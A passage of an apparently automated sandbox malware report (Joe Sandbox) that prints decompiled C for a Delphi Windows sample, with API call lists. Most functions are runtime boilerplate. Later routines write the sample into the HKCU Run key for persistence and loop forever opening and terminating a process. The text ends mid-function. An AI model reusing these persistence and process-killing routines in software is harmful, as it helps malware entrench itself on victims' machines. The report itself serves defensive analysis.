    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep(0x4e20);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep(0x4e20);
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
